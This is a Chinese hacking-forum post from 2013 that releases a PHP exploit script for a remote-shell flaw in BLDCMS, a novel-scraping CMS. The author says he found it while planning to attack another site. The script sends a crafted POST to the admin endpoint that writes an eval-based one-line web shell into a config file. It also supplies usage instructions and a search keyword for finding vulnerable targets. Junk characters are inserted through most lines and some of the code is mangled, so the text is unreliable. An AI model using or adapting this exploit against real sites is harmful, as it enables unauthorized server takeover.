之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞5 n. I" T- [$ m! {
9 P3 k9 \" `5 v/ K+ g5 W
! a+ y$ s# w* [* y, {
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 * N' [ ?, Z4 l+ r
; w/ L3 t ?. E# y; A既然都有人发了 我就把我之前写好的EXP放出来吧
% b4 I# A$ I& z; m0 T3 t1 W
" I, H7 z; ~# S& I% ^view source print?01.php;">
, h" I1 H. M3 V& i3 C0 g: u: B. q02.<!--?php4 l3 j4 G5 c1 z
03.echo "-------------------------------------------------------------------
: N& a1 N& a( x+ f* u9 g04. 2 n4 T9 X1 F8 ~/ z1 O
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP& V9 n( L' `. D4 Q, k
06.
: _7 j4 D' U1 h1 h( D8 z07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun$ @8 M' L) D) O6 x( O
08.
% P/ N4 ? Q; [09.QQ:981009941\r\n 2013.3.21\r\n
0 z* X: z) V' l+ k5 \10.
8 y) P" j$ [9 L( {11. 1 K6 h3 X* E% f( ^# Y
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
, m$ a: U) d; E% h6 h13. , s2 N+ m! ^/ [, ?, u% r; v# b( }
14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
' {7 g" x7 D% x1 [2 t/ E15.
$ ^& r" c3 |0 ` A7 ?' E( E16.--------------------------------------------------------------------\r\n";" ]4 c6 L' s% t) W
17.$url=$argv[1];
0 I6 J* ]0 V5 y' D18.$dir=$argv[2];9 o/ A( Y0 I: d
19.$pass=$argv[3];
1 q. J# o0 l- w- J) d. W/ F20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';
( s( ^! @0 z. v. d# Z* F21.if (emptyempty($pass)||emptyempty($url))
. c3 W+ k- r# [. U8 d22.{exit("请输入参数");}! Q1 l7 x: r3 t' q) c
23.else: H- y1 S# y7 ]7 D: l
24.{
8 \3 R# e! h# w$ e5 {2 o' o" \; [25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
# t+ b" C4 y: Y* a* h1 V; X3 h26.
$ q) B' p; B- Q* `27.al;
# q. }+ a X0 {) i28.$length = strlen($fuckdata);
& g) q( g1 y- r; v# B29.function getshell($url,$pass)4 L% t5 m- a5 P" W6 A; x
30.{
3 l. E( n# o T/ s2 Z31.global $url,$dir,$pass,$eval,$length,$fuckdata;+ ?9 h0 K9 j2 k/ o; I4 E
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";" h* q. z' e2 m* h* o
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";+ A: _3 g2 S* K
34.$header .= "User-Agent: MSIE\r\n";0 s' I- o2 Q5 A" ?$ v' q5 F
35.$header .= "Host:".$url."\r\n";' g& A _, ^4 ?9 [' l/ ^" c
36.$header .= "Content-Length: ".$length."\r\n";( f* M- w/ {, R8 ^
37.$header .= "Connection: Close\r\n";
3 f8 ~& f0 _' U- E f6 o! S38.$header .="\r\n";: |. O2 h2 `7 N
39.$header .= $fuckdata."\r\n\r\n";
/ \! W0 `+ c& V. M4 H7 O4 w40.$fp = fsockopen($url, 80,$errno,$errstr,15); v3 @/ W3 q$ q& o
41.if (!$fp)
1 W4 _9 K1 ?' A$ @* v# W1 U* [( ~42.{
' w9 N. t" d& F% T% ] X43.exit ("利用失败:请检查指定目标是否能正常打开");
. X) ^. U, w" E0 }8 h. s44.}
) c- V8 k. r b& y" m5 M45.else{ if (!fputs($fp,$header))! M7 @- a% z2 n5 S( B% g
46.{exit ("利用失败");}3 w7 O( {: @ g. E# S. k0 ?, ]& y( H( K- K
47.else
" q) R y1 z4 ]48.{% l) \. |8 b c
49.$receive = '';
2 f- z( q+ T) S u7 t4 s50.while (!feof($fp)) {+ l9 S; n2 T+ D/ }7 u' Q1 N
51.$receive .= @fgets($fp, 1000);5 c; _5 y; C3 {+ j
52.}
% M. c& i2 R) O# @, M. I9 q( x+ ^53.@fclose($fp);
& d% p# d* h" ^4 l/ a {0 v. Z3 m54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标
# G! o+ |/ Y7 S+ D! ]+ q55. & A4 |. V, B3 ]. f% x0 \1 w
56.GPC是否=off)";
- r/ F+ Q' u' l& Z( w57.}}
( @) Z0 Q0 M/ j58.}5 l N/ f% W& D! M: s
59.}
. M% @7 u# r0 o4 z/ I. ~5 F60.getshell($url,$pass);
H; s3 s& h" l61.?--> I- G7 A3 I- t. R' m" }
+ @2 i& D# S2 R: Y# j: ?+ q% R7 b- s
, R l0 X/ l0 L$ Q% C; R2 V, r
by 数据流
% H% L& x) y' g1 h% X+ q: q: n9 m |
发表于 2013-3-26 20:49:10
收藏
支持
反对